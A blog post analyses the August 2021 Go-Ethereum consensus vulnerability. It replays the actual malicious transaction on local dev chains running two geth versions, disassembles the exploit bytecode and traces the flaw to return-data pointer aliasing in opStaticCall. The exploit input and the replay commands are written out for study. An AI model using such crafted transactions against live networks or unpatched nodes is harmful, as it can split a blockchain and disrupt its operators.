On August 27th 2021, a malicious transaction was created on the Ethereum mainnet, targeting a vulnerability in all versions of Go-Ethereum up to 1.10.7. If successful, this could have resulted in a fork of the production network. Fortunately, this could be avoided as a sufficient number of nodes were already running version 1.10.8 of Go-Ethereum which had been released as a hotfix three days ago. Armed with the understanding from my previous posts of how the EVM and in particular calls work internally, we are now in a position to analyze what really happened and how the exploit works.
What happened
On August 24th, the Go-Ethereum developer team rushed to release geth v1.10.8 which was announced as a hotfix, fixing a vulnerability that had been discovered during an audit of the Telos EVM, which is a copy of the Ethereum EVM running on the Telos blockchain. In the announcement, no details were made public yet, but in the meantime, more details have been posted by other teams and researchers (for instance here).
If you release a hotfix in an open source project, making it easy for everybody to simply ask GitHub to create a diff for you, obviously the black hats will start to reverse-engineer the changes to understand what the problem was and will try to exploit this. This is exactly what happened in this case as well.
In fact, three days later, on August 27th, one of the Go-Ethereum core developers posted an alert on Twitter, urging node maintainers to upgrade and announcing that an active attempt to exploit the vulnerability had been observed on mainnet. In the same thread, a link to the malicious transaction (with transaction hash 0x1cb6fb36633d270edefc04d048145b4298e67b8aa82a9e5ec4aa1435dd770ce4) on Etherscan was published shortly after. It turns out that the root cause of the issue is related to how geth handles the processing of calls and their return values, and, having gone through all this in the previous posts, we are now in a good position to understand what the problem was. In this section, we will use the details of the malicious transaction to replay it, both with geth 1.10.8 (where the problem has been fixed) and geth 1.10.6 (where the problem still exists), to understand why it has the potential to cause a split of the blockchain. In the next section, we will then analyze the source code to understand the issue and how it has been fixed.
Let us first replay the transaction using geth 1.10.8. I assume that you have copies of geth 1.10.8 and geth 1.10.6 in your path (if not, head over to the project download page and get the binaries for your OS). Our approach will be to create two blockchain data directories, one for each version, so that we start with the same initial state. We will then run the transaction against both versions and observe that the outcomes differ.
There is a little subtlety, though. If you start geth with a fresh data directory, it will also randomly create a new developer account which becomes part of the genesis block. Therefore, running geth twice with different data directories will in general not produce the same initial state. To avoid this, we share the key store between both instances, so that they both use the same developer account. So we will have three directories – geth1108 which will be the data directory for v1.10.8, geth1106 which will be the data directory for v1.10.6, and gethcommon which will contain the key store. We will start with geth v1.10.8 which will also create the developer account for us.
# Assume that geth1108 and geth1106 are the respective binary
# and on your path
mkdir geth1108
mkdir gethcommon
geth1108 \
--datadir $(pwd)/geth1108/ \
--keystore $(pwd)/gethcommon/ \
--dev \
--http
Once the client is running, let us, for later reference, get the hash of the genesis block. In a separate terminal (but in the same working directory), attach a geth console, and, once the console prompt appears, get the hash value of the genesis block.
geth1108 attach $(pwd)/geth1108/geth.ipc
eth.getBlockByNumber(0).hash
Write down this hash value somewhere, for me, it was 0x3b154292c6ec669d736df498663075cf7140b3aa3f287a5dc6b55477937f8ad6, but when you try this, you will get a different value as you will most likely get a different etherbase account and thus a different genesis block.
Now let us run the exploit transaction, determine the address of the contract that has been generated and get the contract (runtime) code and the hash of the resulting block.
dev = eth.accounts[0]
input = "0x3034526020600760203460045afa602034343e604034f3"
value = 0
txn = {
"from": dev,
"value": value,
"input": input,
"gas": 200000
}
txnhash = eth.sendTransaction(txn)
// wait until the transaction has been mined, then run
c = eth.getTransactionReceipt(txnhash).contractAddress
eth.getCode(c)
eth.getBlockByNumber(1).hash
Again, write down the the hash value of the second block and the contract code. Now let us repeat all this with geth 1.10.6. Stop the console and the running instance of geth. Then start a new instance of geth 1.10.6, using, as explained above, a different data directory but the same key store directory.
mkdir geth1106
geth1106 \
--datadir $(pwd)/geth1106/ \
--keystore $(pwd)/gethcommon/ \
--dev \
--http
Looking at the startup messages of the client, you should be able to verify that the developer account is the same as before. Now start the geth console again, this time pointing to the IPC endpoint of the now running geth 1.10.6
geth1106 attach $(pwd)/geth1106/geth.ipc
Now, repeat the steps above. First, determine the hash value of the first block and verify that you get the same result as previously. Then, run the code above to also submit the transaction in our new blockchain, get the code and the hash number of the generated block.
You should see that the code generated by geth 1.10.6 is different. In fact, the code produced with geth 1.10.8 should be the contract address (32 bytes), followed by the last seven bytes of the contract address and filled up with zeros. For geth 1.10.6, the code consists of the first seven bytes of the contract address, followed by the full contract address and again filled up with zeros . Correspondingly, the hash of the new block is different (because the state is different and the state root is part of the block).
So we see that two different versions of the client start with the same state (the genesis block) and run the same transaction, but arrive at a different state after the transaction has been processed. This, of course, is a desaster – if a network is comprised of nodes with these two versions, the nodes will form two partitions (one running the new version and one running the old version) and the members of the two partitions will disagree about the correct state. Thus, in the worst case, the chain will fork.
Fortunately, this is not what happened in real life, as apparently a sufficiently large number of nodes had already upgraded to the latest version when the exploit hit the network.
So we have managed to reconstruct the attack and verify that it does, in fact, lead to a potential fork. Let us now try to understand what the problem was and how the exploit works.
Why it happened
To understand what the exploit code is doing, let us disassemble it, using for instance debug.traceBlockByNumber(1)[0].result
in the geth console. Here is an opcode view of the input data (which, as we know, will be run as deploy bytecode when the transaction is processed).
ADDRESS
CALLVALUE
MSTORE
PUSH1 0x20
PUSH1 0x07
PUSH1 0x20
CALLVALUE
PUSH1 0x04
GAS
STATICCALL
PUSH1 0x20
CALLVALUE
CALLVALUE
RETURNDATACOPY
PUSH1 0x40
RETURN
The first three lines will push the address of the contract being created and the call value (which is zero) onto the stack and run MSTORE
, so that the stack will be empty again and the memory will contain the contract address at position 0x0.
Next, the code again sets up the stack, which, when we reach the STATICCALL, will look as follows (items at the top of the stack on the left)
remaining gas | 0x4 | 0x0 | 0x20 | 0x7 | 0x20
Now we know that a call to address 0x04 invokes the precompiled contract “data copy”. The input is specified by items three and four on the stack, i.e. the 32 bytes at address 0x0, which, as we know, is the contract address. The output is to be placed at address 0x7. Thus after returning, the memory contains the first 7 bytes of the contract at 0x0, followed by the full contract address.
Next, we again see a couple of instructions that prepare the stack, and then we invoke RETURNDATACOPY
. Upon reaching this opcode, our stack is
0x0 | 0x0 | 0x20 | 0x1
Recall that RETURNDATACOPY
is supposed to copy the result of the last call-like operation to memory. In this case, we ask the EVM to copy the result of the last CALL (which, as we know, is the contract address) to address 0x0. Thus after executing this statement, the memory should contain the contract address at location 0x0, followed by the last seven bytes of the contract address at the beginning of the second 32 byte word. The final RETURN
would the return these two words as runtime bytecode, so that the runtime bytecode should be the contract address, followed by the last seven bytes of the contract address repeated. This, in fact, is what you observe when you look at the trace and the contract generated with geth 1.10.8
Unfortunately, with geth 1.10.6, the trace shows that here, the RETURNDATACOPY
does not change the memory content at all. Consequently, the runtime bytecode is the current memory content, i.e. the first seven bytes of the contract address followed by the full contract address. This is the bug that has been discovered and exploited.
Let us now take a look at the Go-Ethereum source code and try to understand what the problem is. In our previous posts (here, here and here) on the inner workings of the EVM, we have already analyzed in detail how a call works internally. We process the STATICCALL
in the opStaticCall function where we invoke the StaticCall
method of the EVM. Here, we figure out that the target of the call is a precompiled contract, so we call RunPrecompiledContract
. At this point in time, the input is a pointer to the memory of the calling contract, starting at offset 0x0, i.e. the contract address.
The implementation of the precompiled contract at address 0x4 now simply returns the exact same pointer again. Thus, when we get back into opStaticCall
, the variable ret
is now a pointer to offset 0x0 in the contract memory. Next, we copy the return value of the call (the contract address) to its target location in memory, i.e. to offset 0x7.
The problem is that this of course modifies the memory to which ret
still points. Thus the value at the memory location pointed to by ret
is now no longer the return value of the precompiled contract, but the new, overwritten memory content. Unfortunately, back in the main interpreter loop, we nevertheless use the returned pointer and assign it to the return data buffer (here). Thus the return data buffer does now not contain the original return value of the precompiled contract,as it should, but the already modified memory content. When we now access this with RETURNDATACOPY
, we copy this memory content to itself, resulting in the effective no-op that we observe.
In version 1.10.8, this line has been added in opStaticCall
which creates a copy of the return value before modifying the memory content, thereby avoiding the problem. Thus, as we can observe, version 1.10.8 correctly returns the actual contract address when executing the RETURNDATACOPY
opcode. A nice example for the risks inherent with the use of pointers in any programming language…..
Personally, I was a bit surprised to see this happening, as a related vulnerability was already identified and fixed with v1.9.17 in July 2020. This is also an interesting coincidence as at this time, the developers had chosen not to declare this release a hotfix, and consequently, many miners did not upgrade. The vulnerability was then actually exploited in November 2020, and splitted nodes that had not yet been upgraded off from the network. The geth team later conducted a post mortem in which they also argued why they had chosen not the announce the fix in public but to effectively ship it as an unannounced hard fork. In hindsight, this probably was a good decision – after all, almost four months had passed after the release without anyone noticing and exploiting the change. In the current case, where the team has chosen to make the fix public and to urge operators to upgrade on social media, it only took three days between the upgrade and the exploit, so this will most likely re-ignite the debate on how the team should handle consensus bugs once they have been discovered (but hopefully also a debate about how to better catch this sort of issues in the future).
This closes our post for today – I hope you found it interesting to see how a real-world consensus bug might look like and how it could be exploited. Hope to see you soon.
1 Comment